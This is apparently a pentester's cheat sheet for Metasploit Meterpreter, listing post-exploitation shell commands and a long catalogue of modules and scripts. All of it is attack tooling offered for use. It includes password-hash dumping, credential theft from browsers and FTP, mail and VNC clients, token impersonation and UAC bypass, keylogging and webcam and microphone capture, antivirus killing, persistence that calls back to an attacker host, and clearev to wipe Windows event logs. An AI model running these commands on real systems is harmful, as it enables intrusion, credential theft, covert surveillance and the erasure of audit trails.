Meterpreter Cheat Sheet

2 minute read

Cheat sheet for useful meterpreter commands, modules, and scripts.

Meterpreter Shell Commands

meterpreter> <command>

cd C:\target\directory
pwd
ls
cat <file>

getuid
sysinfo 
ipconfig 

ps
kill <pid>

upload <local-file> C:\\upload\\dir\\
download C:\\download\\file <local-outfile>
execute -f C:\\exploit.exe 

search -f <filename>
search -f *.txt C:\\target\\dir   

shell   

portfwd list
portfwd add -l <local-port> -p <destination-port> -r <target-ip>
portfwd delete -l <local-port> -p <destination-port> -r <target-ip>
portfwd flush 

getsystem
hashdump
run post/multi/recon/local_exploit_suggester
run post/windows/gather/enum_patches
run post/windows/gather/credentials/gpp

load incognito
list_tokens -u
impersonate_token 'VICTIM\user'

run persistence -X -i 10 -p <lport> -r <lhost>

clearev    // clear Application, System, and Security logs.

Modules and Meterpreter Scripts

meterpreter> run <command>

run arp_scanner
run autoroute
run checkvm
run credcollect
run domain_list_gen
run dumplinks
run duplicate
run enum_chrome
run enum_firefox
run enum_logged_on_users
run enum_powershell_env
run enum_putty
run enum_shares
run enum_vmware
run event_manager
run file_collector
run get_application_list
run get_env
run get_filezilla_creds
run get_local_subnets
run get_pidgin_creds
run get_valid_community
run getcountermeasure
run getgui
run gettelnet
run getvncpw
run hashdump *
run hostsedit
run keylogrecorder
run killav
run metsvc
run migrate
run multi_console_command
run multi_meter_inject
run multicommand
run multiscript
run netenum
run packetrecorder
run panda_2007_pavsrv51
run persistence
run pml_driver_config
run post/multi/gather/apple_ios_backup
run post/multi/gather/dns_bruteforce
run post/multi/gather/dns_reverse_lookup
run post/multi/gather/dns_srv_lookup
run post/multi/gather/enum_vbox
run post/multi/gather/env
run post/multi/gather/filezilla_client_cred
run post/multi/gather/find_vmx
run post/multi/gather/firefox_creds
run post/multi/gather/multi_command
run post/multi/gather/pgpass_creds
run post/multi/gather/pidgin_cred
run post/multi/gather/ping_sweep
run post/multi/gather/run_console_rc_file
run post/multi/gather/skype_enum
run post/multi/gather/thunderbird_creds
run post/multi/general/close
run post/multi/general/execute
run post/multi/manage/multi_post
run post/multi/pro/agent
run post/multi/pro/agent_cleaner
run post/multi/pro/macro
run post/multi/recon/local_exploit_suggester * 
run post/windows/capture/keylog_recorder
run post/windows/capture/lockout_keylogger
run post/windows/escalate/bypassuac
run post/windows/escalate/droplnk
run post/windows/escalate/getsystem
run post/windows/escalate/ms10_073_kbdlayout
run post/windows/escalate/ms10_092_schelevator
run post/windows/escalate/net_runtime_modify
run post/windows/escalate/screen_unlock
run post/windows/escalate/service_permissions
run post/windows/gather/arp_scanner
run post/windows/gather/bitcoin_jacker
run post/windows/gather/cachedump
run post/windows/gather/checkvm
run post/windows/gather/credentials/coreftp
run post/windows/gather/credentials/credential_collector
run post/windows/gather/credentials/dyndns
run post/windows/gather/credentials/enum_cred_store
run post/windows/gather/credentials/enum_picasa_pwds
run post/windows/gather/credentials/epo_sql
run post/windows/gather/credentials/filezilla_server
run post/windows/gather/credentials/flashfxp
run post/windows/gather/credentials/ftpnavigator
run post/windows/gather/credentials/ftpx
run post/windows/gather/credentials/gpp * 
run post/windows/gather/credentials/idm
run post/windows/gather/credentials/imail
run post/windows/gather/credentials/imvu
run post/windows/gather/credentials/meebo
run post/windows/gather/credentials/mremote
run post/windows/gather/credentials/nimbuzz
run post/windows/gather/credentials/outlook
run post/windows/gather/credentials/razorsql
run post/windows/gather/credentials/smartftp
run post/windows/gather/credentials/tortoisesvn
run post/windows/gather/credentials/total_commander
run post/windows/gather/credentials/trillian
run post/windows/gather/credentials/vnc
run post/windows/gather/credentials/windows_autologin
run post/windows/gather/credentials/winscp
run post/windows/gather/credentials/wsftp_client
run post/windows/gather/dumplinks
run post/windows/gather/enum_applications
run post/windows/gather/enum_artifacts
run post/windows/gather/enum_chrome
run post/windows/gather/enum_computers
run post/windows/gather/enum_db
run post/windows/gather/enum_devices
run post/windows/gather/enum_dirperms
run post/windows/gather/enum_domain
run post/windows/gather/enum_domain_group_users
run post/windows/gather/enum_domain_tokens
run post/windows/gather/enum_domains
run post/windows/gather/enum_files
run post/windows/gather/enum_hostfile
run post/windows/gather/enum_ie
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_ms_product_keys
run post/windows/gather/enum_patches * 
run post/windows/gather/enum_powershell_env
run post/windows/gather/enum_proxy
run post/windows/gather/enum_services
run post/windows/gather/enum_shares
run post/windows/gather/enum_snmp
run post/windows/gather/enum_termserv
run post/windows/gather/enum_tokens
run post/windows/gather/enum_tomcat
run post/windows/gather/enum_unattend
run post/windows/gather/forensics/duqu_check
run post/windows/gather/forensics/enum_drives
run post/windows/gather/forensics/imager
run post/windows/gather/forensics/nbd_server
run post/windows/gather/hashdump
run post/windows/gather/memory_grep
run post/windows/gather/resolve_sid
run post/windows/gather/reverse_lookup
run post/windows/gather/screen_spy
run post/windows/gather/screenshot
run post/windows/gather/smart_hashdump
run post/windows/gather/tcpnetstat
run post/windows/gather/usb_history
run post/windows/gather/win_privs
run post/windows/gather/wmic_command
run post/windows/manage/add_user_domain
run post/windows/manage/autoroute
run post/windows/manage/clone_proxy_settings
run post/windows/manage/delete_user
run post/windows/manage/download_exec
run post/windows/manage/enable_rdp
run post/windows/manage/inject_ca
run post/windows/manage/inject_host
run post/windows/manage/migrate
run post/windows/manage/mssql_local_auth_bypass
run post/windows/manage/multi_meterpreter_inject
run post/windows/manage/nbd_server
run post/windows/manage/payload_inject
run post/windows/manage/persistence
run post/windows/manage/powershell/exec_powershell
run post/windows/manage/pxexploit
run post/windows/manage/remove_ca
run post/windows/manage/remove_host
run post/windows/manage/rpcapd_start
run post/windows/manage/run_as
run post/windows/manage/sdel
run post/windows/manage/smart_migrate
run post/windows/manage/vss_create
run post/windows/manage/vss_list
run post/windows/manage/vss_mount
run post/windows/manage/vss_set_storage
run post/windows/manage/vss_storage
run post/windows/recon/computer_browser_discovery
run post/windows/recon/resolve_hostname
run post/windows/recon/resolve_ip
run post/windows/wlan/wlan_bss_list
run post/windows/wlan/wlan_current_connection
run post/windows/wlan/wlan_disconnect
run post/windows/wlan/wlan_profile
run powerdump
run prefetchtool
run process_memdump
run remotewinenum
run scheduleme
run schelevator
run schtasksabuse
run scraper
run screen_unlock
run screenspy
run search_dwld
run service_manager
run service_permissions_escalate
run sound_recorder
run srt_webdrive_priv
run uploadexec
run virtualbox_sysenter_dos
run virusscan_bypass
run vnc
run webcam
run win32-sshclient
run win32-sshserver
run winbf
run winenum
run wmic